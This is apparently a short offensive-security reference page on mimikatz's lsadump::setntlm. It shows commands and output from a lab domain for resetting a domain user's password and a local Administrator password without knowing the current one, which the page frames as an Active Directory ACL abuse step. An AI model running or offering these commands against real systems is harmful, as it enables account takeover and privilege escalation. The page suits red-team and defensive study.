setntlm
lsadump::setntlm can be used to perform a password reset without knowing the user's current password. It can be useful during an active directory Access Control (ACL) abuse scenario. It has the following command line arguments:
  • /ntlm: The new NT hash for the target user
  • /user: The username of the account to target
  • /password: The new password for the target user
  • /server: hostname of the target server
LM and NT hashes are used to authenticate accounts using the NTLM protocol. These hashes are often called NTLM hash and many documentations, resources, blogpost and tools mix terms. In this case, "ntlm" refers to the NT hash.

Reset for a Domain User

1
mimikatz # lsadump::setntlm /user:optimus /password:VeryStrongPass1! /server:dc.hacklab.local
2
NTLM : 7cb0b13a4661116dd2c306fb2f4536b2
3
​
4
Target server: dc.hacklab.local
5
Target user : optimus
6
Domain name : hacklab
7
Domain SID : S-1-5-21-2725560159-1428537199-2260736313
8
User RID : 1732
9
​
10
>> Informations are in the target SAM!
Copied!

Reset for a Local User

1
mimikatz # lsadump::setntlm /user:Administrator /password:Super_SecretPass1! /server:Win10.hacklab.local
2
NTLM : b09a14d2d325026f8986d4a874fbcbc7
3
​
4
Target server: Win10.hacklab.local
5
Target user : Administrator
6
Domain name : WIN10
7
Domain SID : S-1-5-21-1604892360-3618202543-1602915806
8
User RID : 500
9
​
10
>> Informations are in the target SAM!
Copied!
Last modified 6mo ago